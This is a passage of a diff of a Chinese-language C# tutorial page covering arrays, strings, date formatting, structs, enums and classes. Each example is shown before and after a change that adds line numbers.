                              }
                              }
                              }
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              25
                              26
                              27
                              28
                              29
                              30
                              31
                              32
                              33
                              34
                              35
                              36
                              37
                              38
                              39
                              40
                              41
                              using System;

                              namespace TwoDimensionalArrayExample
                              {
                              class Program
                              {
                              static void Main(string[] args)
                              {
                              // 定义一个3行4列的二维数组
                              int[,] array = new int[3, 4];

                              // 使用嵌套循环来初始化数组元素
                              for (int i = 0; i < 3; i++)
                              {
                              for (int j = 0; j < 4; j++)
                              {
                              array[i, j] = i * j; // 举例:初始化为行索引乘以列索引
                              }
                              }

                              /* 也可直接初始化:
                              int[,] array =
                              {
                              { 1, 2, 3, 4 },
                              { 5, 6, 7, 8 },
                              { 9, 10, 11, 12 }
                              };
                              */

                              // 打印数组元素
                              for (int i = 0; i < 3; i++)
                              {
                              for (int j = 0; j < 4; j++)
                              {
                              Console.Write(array[i, j] + "\t");
                              }
                              Console.WriteLine();
                              }
                              }
                              }
                              }

                              C# 多维数组

                              ​ C# 中二维数组的概念不同于 C/C++、java 等语言中的二维数组,C# 中的二维数组更像是一个矩阵:

                              -
                              int [,] a = new int [3,4] {
                              {0, 1, 2, 3} , /* 初始化索引号为 0 的行 */
                              {4, 5, 6, 7} , /* 初始化索引号为 1 的行 */
                              {8, 9, 10, 11} /* 初始化索引号为 2 的行 */
                              };
                              +
                              1
                              2
                              3
                              4
                              5
                              int [,] a = new int [3,4] {
                              {0, 1, 2, 3} , /* 初始化索引号为 0 的行 */
                              {4, 5, 6, 7} , /* 初始化索引号为 1 的行 */
                              {8, 9, 10, 11} /* 初始化索引号为 2 的行 */
                              };

                              ​ 这个如果是从其他语言转来学习 C# 可能会和交错数组的概念弄混。

                              C# 交错数组

                                @@ -805,15 +803,15 @@

                                int [][] scores;
                                +
                                1
                                int [][] scores;

                                ​ 声明一个数组不会在内存中创建数组。创建上面的数组:

                                -
                                int[][] scores = new int[5][];
                                for (int i = 0; i < scores.Length; i++)
                                {
                                scores[i] = new int[4];
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                int[][] scores = new int[5][];
                                for (int i = 0; i < scores.Length; i++)
                                {
                                scores[i] = new int[4];
                                }

                                ​ 您可以初始化一个交错数组,如下所示:

                                -
                                int[][] scores = new int[2][]{new int[]{92,93,94},new int[]{85,66,87,88}};
                                +
                                1
                                int[][] scores = new int[2][]{new int[]{92,93,94},new int[]{85,66,87,88}};

                                C# 传递数组给函数

                                ​ 在 C# 中,您可以传递数组作为函数的参数。您可以通过指定不带索引的数组名称来给函数传递一个指向数组的指针。

                                ​ 下面的实例演示了如何传递数组给函数:

                                -
                                using System;

                                namespace ArrayApplication
                                {
                                class MyArray
                                {
                                double getAverage(int[] arr, int size)
                                {
                                int i;
                                double avg;
                                int sum = 0;

                                for (i = 0; i < size; ++i)
                                {
                                sum += arr[i];
                                }

                                avg = (double)sum / size;
                                return avg;
                                }
                                static void Main(string[] args)
                                {
                                MyArray app = new MyArray();
                                /* 一个带有 5 个元素的 int 数组 */
                                int [] balance = new int[]{1000, 2, 3, 17, 50};
                                double avg;

                                /* 传递数组的指针作为参数 */
                                avg = app.getAverage(balance, 5 ) ;

                                /* 输出返回值 */
                                Console.WriteLine( "平均值是: {0} ", avg );
                                Console.ReadKey();
                                }
                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                25
                                26
                                27
                                28
                                29
                                30
                                31
                                32
                                33
                                34
                                35
                                36
                                using System;

                                namespace ArrayApplication
                                {
                                class MyArray
                                {
                                double getAverage(int[] arr, int size)
                                {
                                int i;
                                double avg;
                                int sum = 0;

                                for (i = 0; i < size; ++i)
                                {
                                sum += arr[i];
                                }

                                avg = (double)sum / size;
                                return avg;
                                }
                                static void Main(string[] args)
                                {
                                MyArray app = new MyArray();
                                /* 一个带有 5 个元素的 int 数组 */
                                int [] balance = new int[]{1000, 2, 3, 17, 50};
                                double avg;

                                /* 传递数组的指针作为参数 */
                                avg = app.getAverage(balance, 5 ) ;

                                /* 输出返回值 */
                                Console.WriteLine( "平均值是: {0} ", avg );
                                Console.ReadKey();
                                }
                                }
                                }

                                C# 字符串(String)

                                • C# 结构体(Struct) | 菜鸟教程 (runoob.com)
                                • @@ -828,8 +826,8 @@

                                  using System;

                                  namespace StringApplication
                                  {
                                  class Program
                                  {
                                  static void Main(string[] args)
                                  {
                                  // 字符串,字符串连接
                                  string fname, lname;
                                  fname = "Rowan";
                                  lname = "Atkinson";

                                  string fullname = fname + lname;
                                  Console.WriteLine("Full Name: {0}", fullname);

                                  // 通过使用 string 构造函数
                                  char[] letters = { 'H', 'e', 'l', 'l', 'o' };
                                  string greetings = new string(letters);
                                  Console.WriteLine("Greetings: {0}", greetings);

                                  // 方法返回字符串
                                  string[] sarray = { "Hello", "From", "Tutorials", "Point" };
                                  string message = String.Join(" ", sarray);
                                  Console.WriteLine("Message: {0}", message);

                                  // 用于转化值的格式化方法
                                  DateTime waiting = new DateTime(2012, 10, 10, 17, 58, 1);
                                  string chat = String.Format("Message sent at {0:t} on {0:D}",
                                  waiting);
                                  Console.WriteLine("Message: {0}", chat);
                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  -
                                  Full Name: RowanAtkinson
                                  Greetings: Hello
                                  Message: Hello From Tutorials Point
                                  Message: Message sent at 17:58 on 2012年10月10日
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  9
                                  10
                                  11
                                  12
                                  13
                                  14
                                  15
                                  16
                                  17
                                  18
                                  19
                                  20
                                  21
                                  22
                                  23
                                  24
                                  25
                                  26
                                  27
                                  28
                                  29
                                  30
                                  31
                                  32
                                  33
                                  34
                                  35
                                  using System;

                                  namespace StringApplication
                                  {
                                  class Program
                                  {
                                  static void Main(string[] args)
                                  {
                                  // 字符串,字符串连接
                                  string fname, lname;
                                  fname = "Rowan";
                                  lname = "Atkinson";

                                  string fullname = fname + lname;
                                  Console.WriteLine("Full Name: {0}", fullname);

                                  // 通过使用 string 构造函数
                                  char[] letters = { 'H', 'e', 'l', 'l', 'o' };
                                  string greetings = new string(letters);
                                  Console.WriteLine("Greetings: {0}", greetings);

                                  // 方法返回字符串
                                  string[] sarray = { "Hello", "From", "Tutorials", "Point" };
                                  string message = String.Join(" ", sarray);
                                  Console.WriteLine("Message: {0}", message);

                                  // 用于转化值的格式化方法
                                  DateTime waiting = new DateTime(2012, 10, 10, 17, 58, 1);
                                  string chat = String.Format("Message sent at {0:t} on {0:D}",
                                  waiting);
                                  Console.WriteLine("Message: {0}", chat);
                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  +
                                  1
                                  2
                                  3
                                  4
                                  Full Name: RowanAtkinson
                                  Greetings: Hello
                                  Message: Hello From Tutorials Point
                                  Message: Message sent at 17:58 on 2012年10月10日

                                  String 类的属性

                                  ​ Length:在当前的 String 对象中获取字符数。

                                  String 类的方法

                                  @@ -838,32 +836,32 @@
                                  C ++ string ==和compare()之间的区别? | 码农家园 (codenong.com),似乎 String.Compare()== 没什么区别。
                                -
                                using System;

                                namespace StringApplication
                                {
                                class StringProg
                                {
                                static void Main(string[] args)
                                {
                                string str1 = "This is test";
                                string str2 = "This is test";

                                if (String.Compare(str1, str2) == 0)
                                {
                                Console.WriteLine(str1 + " and " + str2 + " are equal.");
                                }
                                else
                                {
                                Console.WriteLine(str1 + " and " + str2 + " are not equal.");
                                }

                                Console.ReadKey();
                                }
                                }
                                }
                                -
                                This is test and This is test are equal.
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                using System;

                                namespace StringApplication
                                {
                                class StringProg
                                {
                                static void Main(string[] args)
                                {
                                string str1 = "This is test";
                                string str2 = "This is test";

                                if (String.Compare(str1, str2) == 0)
                                {
                                Console.WriteLine(str1 + " and " + str2 + " are equal.");
                                }
                                else
                                {
                                Console.WriteLine(str1 + " and " + str2 + " are not equal.");
                                }

                                Console.ReadKey();
                                }
                                }
                                }
                                +
                                1
                                This is test and This is test are equal.
                                字符串包含字符串

                                Contains()

                                -
                                using System;

                                namespace StringApplication
                                {
                                class StringProg
                                {
                                static void Main(string[] args)
                                {
                                string str = "This is test";
                                if (str.Contains("test"))
                                {
                                Console.WriteLine("The sequence 'test' was found.");
                                }
                                Console.ReadKey();
                                }
                                }
                                }
                                -
                                The sequence 'test' was found.
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                using System;

                                namespace StringApplication
                                {
                                class StringProg
                                {
                                static void Main(string[] args)
                                {
                                string str = "This is test";
                                if (str.Contains("test"))
                                {
                                Console.WriteLine("The sequence 'test' was found.");
                                }
                                Console.ReadKey();
                                }
                                }
                                }
                                +
                                1
                                The sequence 'test' was found.
                                获取子字符串

                                Substring()

                                -
                                using System;
                                namespace StringApplication
                                {
                                class StringProg
                                {
                                static void Main(string[] args)
                                {
                                string str = "01234567890123456789";
                                Console.WriteLine(str);
                                string substr = str.Substring(10);
                                Console.WriteLine(substr);
                                Console.ReadKey();
                                }
                                }
                                }
                                -
                                01234567890123456789
                                0123456789
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                using System;
                                namespace StringApplication
                                {
                                class StringProg
                                {
                                static void Main(string[] args)
                                {
                                string str = "01234567890123456789";
                                Console.WriteLine(str);
                                string substr = str.Substring(10);
                                Console.WriteLine(substr);
                                Console.ReadKey();
                                }
                                }
                                }
                                +
                                1
                                2
                                01234567890123456789
                                0123456789
                                连接字符串

                                Join()

                                -
                                using System;

                                namespace StringApplication
                                {
                                class StringProg
                                {
                                static void Main(string[] args)
                                {
                                string[] starray = new string[]{"Down the way nights are dark",
                                "And the sun shines daily on the mountain top",
                                "I took a trip on a sailing ship",
                                "And when I reached Jamaica",
                                "I made a stop"};

                                string str = String.Join("\n", starray);
                                Console.WriteLine(str);
                                Console.ReadKey() ;
                                }
                                }
                                }
                                -
                                Down the way nights are dark
                                And the sun shines daily on the mountain top
                                I took a trip on a sailing ship
                                And when I reached Jamaica
                                I made a stop
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                using System;

                                namespace StringApplication
                                {
                                class StringProg
                                {
                                static void Main(string[] args)
                                {
                                string[] starray = new string[]{"Down the way nights are dark",
                                "And the sun shines daily on the mountain top",
                                "I took a trip on a sailing ship",
                                "And when I reached Jamaica",
                                "I made a stop"};

                                string str = String.Join("\n", starray);
                                Console.WriteLine(str);
                                Console.ReadKey() ;
                                }
                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                Down the way nights are dark
                                And the sun shines daily on the mountain top
                                I took a trip on a sailing ship
                                And when I reached Jamaica
                                I made a stop

                                string.Format 格式化日期

                                -
                                DateTime dt = new DateTime(2017, 4, 1, 13, 16, 32, 108);
                                string.Format("{0:y yy yyy yyyy}",dt); // 17 17 2017 2017
                                string.Format("{0:M MM MMM MMMM}", dt);// 4 04 四月 四月
                                string.Format("{0:d dd ddd dddd}", dt);// 1 01 周六 星期六
                                string.Format("{0:t tt}", dt);// 下 下午
                                string.Format("{0:H HH}", dt);// 13 13
                                string.Format("{0:h hh}", dt);// 1 01
                                string.Format("{0:m mm}", dt);// 16 16
                                string.Format("{0:s ss}", dt);// 32 32
                                string.Format("{0:F FF FFF FFFF FFFFF FFFFFF FFFFFFF}", dt);// 1 1 108 108 108 108 108
                                string.Format("{0:f ff fff ffff fffff ffffff fffffff}", dt);// 1 10 108 1080 10800 108000 1080000
                                string.Format("{0:z zz zzz}", dt);// +8 +08 +08:00

                                string.Format("{0:yyyy/MM/dd HH:mm:ss.fff}",dt);  // 2017/04/01 13:16:32.108
                                string.Format("{0:yyyy/MM/dd dddd}", dt);      // 2017/04/01 星期六
                                string.Format("{0:yyyy/MM/dd dddd tt hh:mm}", dt); // 2017/04/01 星期六 下午 01:16
                                string.Format("{0:yyyyMMdd}", dt);         // 20170401
                                string.Format("{0:yyyy-MM-dd HH:mm:ss.fff}", dt); // 2017-04-01 13:16:32.108
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                DateTime dt = new DateTime(2017, 4, 1, 13, 16, 32, 108);
                                string.Format("{0:y yy yyy yyyy}",dt); // 17 17 2017 2017
                                string.Format("{0:M MM MMM MMMM}", dt);// 4 04 四月 四月
                                string.Format("{0:d dd ddd dddd}", dt);// 1 01 周六 星期六
                                string.Format("{0:t tt}", dt);// 下 下午
                                string.Format("{0:H HH}", dt);// 13 13
                                string.Format("{0:h hh}", dt);// 1 01
                                string.Format("{0:m mm}", dt);// 16 16
                                string.Format("{0:s ss}", dt);// 32 32
                                string.Format("{0:F FF FFF FFFF FFFFF FFFFFF FFFFFFF}", dt);// 1 1 108 108 108 108 108
                                string.Format("{0:f ff fff ffff fffff ffffff fffffff}", dt);// 1 10 108 1080 10800 108000 1080000
                                string.Format("{0:z zz zzz}", dt);// +8 +08 +08:00

                                string.Format("{0:yyyy/MM/dd HH:mm:ss.fff}",dt);  // 2017/04/01 13:16:32.108
                                string.Format("{0:yyyy/MM/dd dddd}", dt);      // 2017/04/01 星期六
                                string.Format("{0:yyyy/MM/dd dddd tt hh:mm}", dt); // 2017/04/01 星期六 下午 01:16
                                string.Format("{0:yyyyMMdd}", dt);         // 20170401
                                string.Format("{0:yyyy-MM-dd HH:mm:ss.fff}", dt); // 2017-04-01 13:16:32.108

                                ​ 除去 string.Format() 可以对日期进行格式化之外,.ToString() 也可以实现相同的效果:

                                -
                                DateTime dt = new DateTime(2017,4,1,13,16,32,108);
                                dt.ToString("y yy yyy yyyy"); // 17 17 2017 2017
                                dt.ToString("M MM MMM MMMM"); // 4 04 四月 四月
                                dt.ToString("d dd ddd dddd"); // 1 01 周六 星期六
                                dt.ToString("t tt"); // 下 下午
                                dt.ToString("H HH"); // 13 13
                                dt.ToString("h hh"); // 1 01
                                dt.ToString("m mm"); // 16 16
                                dt.ToString("s ss"); // 32 32
                                dt.ToString("F FF FFF FFFF FFFFF FFFFFF FFFFFFF"); // 1 1 108 108 108 108 108
                                dt.ToString("f ff fff ffff fffff ffffff fffffff"); // 1 10 108 1080 10800 108000 1080000
                                dt.ToString("z zz zzz"); // +8 +08 +08:00

                                dt.ToString("yyyy/MM/dd HH:mm:ss.fff"); // 2017/04/01 13:16:32.108
                                dt.ToString("yyyy/MM/dd dddd"); // 2017/04/01 星期六
                                dt.ToString("yyyy/MM/dd dddd tt hh:mm"); // 2017/04/01 星期六 下午 01:16
                                dt.ToString("yyyyMMdd"); // 20170401
                                dt.ToString("yyyy-MM-dd HH:mm:ss.fff");  // 2017-04-01 13:16:32.108
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                DateTime dt = new DateTime(2017,4,1,13,16,32,108);
                                dt.ToString("y yy yyy yyyy"); // 17 17 2017 2017
                                dt.ToString("M MM MMM MMMM"); // 4 04 四月 四月
                                dt.ToString("d dd ddd dddd"); // 1 01 周六 星期六
                                dt.ToString("t tt"); // 下 下午
                                dt.ToString("H HH"); // 13 13
                                dt.ToString("h hh"); // 1 01
                                dt.ToString("m mm"); // 16 16
                                dt.ToString("s ss"); // 32 32
                                dt.ToString("F FF FFF FFFF FFFFF FFFFFF FFFFFFF"); // 1 1 108 108 108 108 108
                                dt.ToString("f ff fff ffff fffff ffffff fffffff"); // 1 10 108 1080 10800 108000 1080000
                                dt.ToString("z zz zzz"); // +8 +08 +08:00

                                dt.ToString("yyyy/MM/dd HH:mm:ss.fff"); // 2017/04/01 13:16:32.108
                                dt.ToString("yyyy/MM/dd dddd"); // 2017/04/01 星期六
                                dt.ToString("yyyy/MM/dd dddd tt hh:mm"); // 2017/04/01 星期六 下午 01:16
                                dt.ToString("yyyyMMdd"); // 20170401
                                dt.ToString("yyyy-MM-dd HH:mm:ss.fff");  // 2017-04-01 13:16:32.108

                                C# 结构体(Struct)

                                ​ 在 C# 中,结构体(struct)是一种值类型(value type),用于组织和存储相关数据。

                                ​ 在 C# 中,结构体是值类型数据结构,这样使得一个单一变量可以存储各种数据类型的相关数据。

                                -
                                using System;
                                using System.Text;

                                struct Books
                                {
                                public string title;
                                public string author;
                                public string subject;
                                public int book_id;
                                };

                                public class testStructure
                                {
                                public static void Main(string[] args)
                                {
                                /* 声明 Book1,类型为 Books */
                                Books Book1;
                                /* 声明 Book2,类型为 Books */
                                Books Book2;

                                /* book 1 详述 */
                                Book1.title = "C Programming";
                                Book1.author = "Nuha Ali";
                                Book1.subject = "C Programming Tutorial";
                                Book1.book_id = 6495407;

                                /* book 2 详述 */
                                Book2.title = "Telecom Billing";
                                Book2.author = "Zara Ali";
                                Book2.subject = "Telecom Billing Tutorial";
                                Book2.book_id = 6495700;

                                /* 打印 Book1 信息 */
                                Console.WriteLine("Book 1 title : {0}", Book1.title);
                                Console.WriteLine("Book 1 author : {0}", Book1.author);
                                Console.WriteLine("Book 1 subject : {0}", Book1.subject);
                                Console.WriteLine("Book 1 book_id :{0}", Book1.book_id);

                                /* 打印 Book2 信息 */
                                Console.WriteLine("Book 2 title : {0}", Book2.title);
                                Console.WriteLine("Book 2 author : {0}", Book2.author);
                                Console.WriteLine("Book 2 subject : {0}", Book2.subject);
                                Console.WriteLine("Book 2 book_id : {0}", Book2.book_id);

                                Console.ReadKey();

                                }
                                }
                                -
                                Book 1 title : C Programming
                                Book 1 author : Nuha Ali
                                Book 1 subject : C Programming Tutorial
                                Book 1 book_id : 6495407
                                Book 2 title : Telecom Billing
                                Book 2 author : Zara Ali
                                Book 2 subject : Telecom Billing Tutorial
                                Book 2 book_id : 6495700
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                25
                                26
                                27
                                28
                                29
                                30
                                31
                                32
                                33
                                34
                                35
                                36
                                37
                                38
                                39
                                40
                                41
                                42
                                43
                                44
                                45
                                46
                                47
                                48
                                using System;
                                using System.Text;

                                struct Books
                                {
                                public string title;
                                public string author;
                                public string subject;
                                public int book_id;
                                };

                                public class testStructure
                                {
                                public static void Main(string[] args)
                                {
                                /* 声明 Book1,类型为 Books */
                                Books Book1;
                                /* 声明 Book2,类型为 Books */
                                Books Book2;

                                /* book 1 详述 */
                                Book1.title = "C Programming";
                                Book1.author = "Nuha Ali";
                                Book1.subject = "C Programming Tutorial";
                                Book1.book_id = 6495407;

                                /* book 2 详述 */
                                Book2.title = "Telecom Billing";
                                Book2.author = "Zara Ali";
                                Book2.subject = "Telecom Billing Tutorial";
                                Book2.book_id = 6495700;

                                /* 打印 Book1 信息 */
                                Console.WriteLine("Book 1 title : {0}", Book1.title);
                                Console.WriteLine("Book 1 author : {0}", Book1.author);
                                Console.WriteLine("Book 1 subject : {0}", Book1.subject);
                                Console.WriteLine("Book 1 book_id :{0}", Book1.book_id);

                                /* 打印 Book2 信息 */
                                Console.WriteLine("Book 2 title : {0}", Book2.title);
                                Console.WriteLine("Book 2 author : {0}", Book2.author);
                                Console.WriteLine("Book 2 subject : {0}", Book2.subject);
                                Console.WriteLine("Book 2 book_id : {0}", Book2.book_id);

                                Console.ReadKey();

                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                Book 1 title : C Programming
                                Book 1 author : Nuha Ali
                                Book 1 subject : C Programming Tutorial
                                Book 1 book_id : 6495407
                                Book 2 title : Telecom Billing
                                Book 2 author : Zara Ali
                                Book 2 subject : Telecom Billing Tutorial
                                Book 2 book_id : 6495700

                                类 vs 结构

                                ​ 类和结构在设计和使用时有不同的考虑因素,类适合表示复杂的对象和行为,支持继承和多态性,而结构则更适合表示轻量级数据和值类型,以提高性能并避免引用的管理开销。

                                ​ 类和结构有以下几个基本的不同点:

                                @@ -905,22 +903,22 @@

                                类 vs

                                ​ 以下实例中,MyStruct 是一个结构,而 MyClass 是一个类。

                                ​ 注释部分演示了结构不能包含无参数的构造函数、不能继承以及结构的实例复制是复制整个结构的内容。与之相反,类可以包含无参数的构造函数,可以继承,并且实例复制是复制引用。

                                class 有点像 python,如果要向 struct 一样修改实例不影响其他实例,需要自己在 class 内定义一个类似 .copy() 的函数)

                                -
                                using System;

                                // 结构声明
                                struct MyStruct
                                {
                                public int X;
                                public int Y;

                                // 结构不能有无参数的构造函数
                                // public MyStruct()
                                // {
                                // }

                                // 有参数的构造函数
                                // CS0171 必须先完全分配字段 'MyStruct.Y' ,然后才能将控件返回给调用方。请考虑更新到语言版本 '11.0' 以自动默认字段
                                public MyStruct(int x, int y)
                                {
                                X = x;
                                Y = y;
                                }

                                // 结构不能继承
                                // struct MyDerivedStruct : MyBaseStruct
                                // {
                                // }
                                }

                                // 类声明
                                class MyClass
                                {
                                public int X;
                                public int Y;

                                // 类可以有无参数的构造函数
                                public MyClass()
                                {
                                }

                                // 有参数的构造函数
                                public MyClass(int x, int y)
                                {
                                X = x;
                                Y = y;
                                }

                                // 类支持继承
                                // class MyDerivedClass : MyBaseClass
                                // {
                                // }

                                public MyClass ShallowCopy()
                                {
                                return (MyClass)this.MemberwiseClone();
                                }
                                }

                                class Program
                                {
                                static void Main()
                                {
                                // 结构是值类型,分配在栈上
                                MyStruct structInstance1 = new MyStruct(1, 2);
                                MyStruct structInstance2 = structInstance1; // 复制整个结构

                                // 类是引用类型,分配在堆上
                                MyClass classInstance1 = new MyClass(3, 4);
                                MyClass classInstance2 = classInstance1; // 复制引用,指向同一个对象
                                MyClass classInstance3 = classInstance1.ShallowCopy(); // 浅拷贝,指向不同对象

                                // 修改结构实例不影响其他实例
                                structInstance1.X = 5;
                                Console.WriteLine($"Struct: {structInstance1.X}, {structInstance2.X}");

                                // 修改类实例会影响其他实例
                                classInstance1.X = 6;
                                Console.WriteLine($"Class: {classInstance1.X}, {classInstance2.X}, {classInstance3.X}");
                                }
                                }
                                -
                                Struct: 5, 1
                                Class: 6, 6, 3
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                25
                                26
                                27
                                28
                                29
                                30
                                31
                                32
                                33
                                34
                                35
                                36
                                37
                                38
                                39
                                40
                                41
                                42
                                43
                                44
                                45
                                46
                                47
                                48
                                49
                                50
                                51
                                52
                                53
                                54
                                55
                                56
                                57
                                58
                                59
                                60
                                61
                                62
                                63
                                64
                                65
                                66
                                67
                                68
                                69
                                70
                                71
                                72
                                73
                                74
                                75
                                76
                                77
                                78
                                using System;

                                // 结构声明
                                struct MyStruct
                                {
                                public int X;
                                public int Y;

                                // 结构不能有无参数的构造函数
                                // public MyStruct()
                                // {
                                // }

                                // 有参数的构造函数
                                // CS0171 必须先完全分配字段 'MyStruct.Y' ,然后才能将控件返回给调用方。请考虑更新到语言版本 '11.0' 以自动默认字段
                                public MyStruct(int x, int y)
                                {
                                X = x;
                                Y = y;
                                }

                                // 结构不能继承
                                // struct MyDerivedStruct : MyBaseStruct
                                // {
                                // }
                                }

                                // 类声明
                                class MyClass
                                {
                                public int X;
                                public int Y;

                                // 类可以有无参数的构造函数
                                public MyClass()
                                {
                                }

                                // 有参数的构造函数
                                public MyClass(int x, int y)
                                {
                                X = x;
                                Y = y;
                                }

                                // 类支持继承
                                // class MyDerivedClass : MyBaseClass
                                // {
                                // }

                                public MyClass ShallowCopy()
                                {
                                return (MyClass)this.MemberwiseClone();
                                }
                                }

                                class Program
                                {
                                static void Main()
                                {
                                // 结构是值类型,分配在栈上
                                MyStruct structInstance1 = new MyStruct(1, 2);
                                MyStruct structInstance2 = structInstance1; // 复制整个结构

                                // 类是引用类型,分配在堆上
                                MyClass classInstance1 = new MyClass(3, 4);
                                MyClass classInstance2 = classInstance1; // 复制引用,指向同一个对象
                                MyClass classInstance3 = classInstance1.ShallowCopy(); // 浅拷贝,指向不同对象

                                // 修改结构实例不影响其他实例
                                structInstance1.X = 5;
                                Console.WriteLine($"Struct: {structInstance1.X}, {structInstance2.X}");

                                // 修改类实例会影响其他实例
                                classInstance1.X = 6;
                                Console.WriteLine($"Class: {classInstance1.X}, {classInstance2.X}, {classInstance3.X}");
                                }
                                }
                                +
                                1
                                2
                                Struct: 5, 1
                                Class: 6, 6, 3

                                C# 枚举(Enum)

                                ​ 枚举列表中的每个符号代表一个整数值,一个比它前面的符号大的整数值。默认情况下,第一个枚举符号的值是 0,当然也可以自己设置。

                                -
                                using System;

                                public class EnumTest
                                {
                                enum Day { Sun = 1, Mon = 3, Tue, Wed, Thu, Fri = 9, Sat };

                                static void Main()
                                {
                                Console.WriteLine("Sun = {0}, Mon = {1}, Tue = {2}, Wed = {3}, Thu = {4}, Fri = {5}, Sat = {6}", (int)Day.Sun, (int)Day.Mon, (int)Day.Tue, (int)Day.Wed, (int)Day.Thu, (int)Day.Fri, (int)Day.Sat);
                                }
                                }
                                -
                                Sun = 1, Mon = 3, Tue = 4, Wed = 5, Thu = 6, Fri = 9, Sat = 10
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                using System;

                                public class EnumTest
                                {
                                enum Day { Sun = 1, Mon = 3, Tue, Wed, Thu, Fri = 9, Sat };

                                static void Main()
                                {
                                Console.WriteLine("Sun = {0}, Mon = {1}, Tue = {2}, Wed = {3}, Thu = {4}, Fri = {5}, Sat = {6}", (int)Day.Sun, (int)Day.Mon, (int)Day.Tue, (int)Day.Wed, (int)Day.Thu, (int)Day.Fri, (int)Day.Sat);
                                }
                                }
                                +
                                1
                                Sun = 1, Mon = 3, Tue = 4, Wed = 5, Thu = 6, Fri = 9, Sat = 10

                                C# 类(Class)

                                类的定义

                                ​ 类的定义是以关键字 class 开始,后跟类的名称。类的主体,包含在一对花括号内。下面是类定义的一般形式:

                                -
                                <access specifier> class  class_name 
                                {
                                // member variables
                                <access specifier> <data type> variable1;
                                <access specifier> <data type> variable2;
                                ...
                                <access specifier> <data type> variableN;
                                // member methods
                                <access specifier> <return type> method1(parameter_list)
                                {
                                // method body
                                }
                                <access specifier> <return type> method2(parameter_list)
                                {
                                // method body
                                }
                                ...
                                <access specifier> <return type> methodN(parameter_list)
                                {
                                // method body
                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                <access specifier> class  class_name 
                                {
                                // member variables
                                <access specifier> <data type> variable1;
                                <access specifier> <data type> variable2;
                                ...
                                <access specifier> <data type> variableN;
                                // member methods
                                <access specifier> <return type> method1(parameter_list)
                                {
                                // method body
                                }
                                <access specifier> <return type> method2(parameter_list)
                                {
                                // method body
                                }
                                ...
                                <access specifier> <return type> methodN(parameter_list)
                                {
                                // method body
                                }
                                }
                                • 访问标识符 <access specifier> 指定了对类及其成员的访问规则。如果没有指定,则使用默认的访问标识符。类的默认访问标识符是 internal,成员的默认访问标识符是 private
                                • @@ -933,8 +931,8 @@

                                  ​ 类的成员函数是一个在类定义中有它的定义或原型的函数,就像其他变量一样。作为类的一个成员,它能在类的任何对象上操作,且能访问该对象的类的所有成员。

                                  ​ 成员变量是对象的属性(从设计角度),且它们保持私有来实现封装。这些变量只能使用公共成员函数来访问。

                                  ​ 让我们使用上面的概念来设置和获取一个类中不同的类成员的值:

                                  -
                                  using System;
                                  namespace BoxApplication
                                  {
                                  class Box
                                  {
                                  private double length; // 长度
                                  private double breadth; // 宽度
                                  private double height; // 高度
                                  public void setLength(double len)
                                  {
                                  length = len;
                                  }

                                  public void setBreadth(double bre)
                                  {
                                  breadth = bre;
                                  }

                                  public void setHeight(double hei)
                                  {
                                  height = hei;
                                  }
                                  public double getVolume()
                                  {
                                  return length * breadth * height;
                                  }
                                  }
                                  class Boxtester
                                  {
                                  static void Main(string[] args)
                                  {
                                  Box Box1 = new Box(); // 声明 Box1,类型为 Box
                                  Box Box2 = new Box(); // 声明 Box2,类型为 Box
                                  double volume; // 体积


                                  // Box1 详述
                                  Box1.setLength(6.0);
                                  Box1.setBreadth(7.0);
                                  Box1.setHeight(5.0);

                                  // Box2 详述
                                  Box2.setLength(12.0);
                                  Box2.setBreadth(13.0);
                                  Box2.setHeight(10.0);

                                  // Box1 的体积
                                  volume = Box1.getVolume();
                                  Console.WriteLine("Box1 的体积: {0}", volume);

                                  // Box2 的体积
                                  volume = Box2.getVolume();
                                  Console.WriteLine("Box2 的体积: {0}", volume);

                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  -
                                  Box1 的体积: 210
                                  Box2 的体积: 1560
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  9
                                  10
                                  11
                                  12
                                  13
                                  14
                                  15
                                  16
                                  17
                                  18
                                  19
                                  20
                                  21
                                  22
                                  23
                                  24
                                  25
                                  26
                                  27
                                  28
                                  29
                                  30
                                  31
                                  32
                                  33
                                  34
                                  35
                                  36
                                  37
                                  38
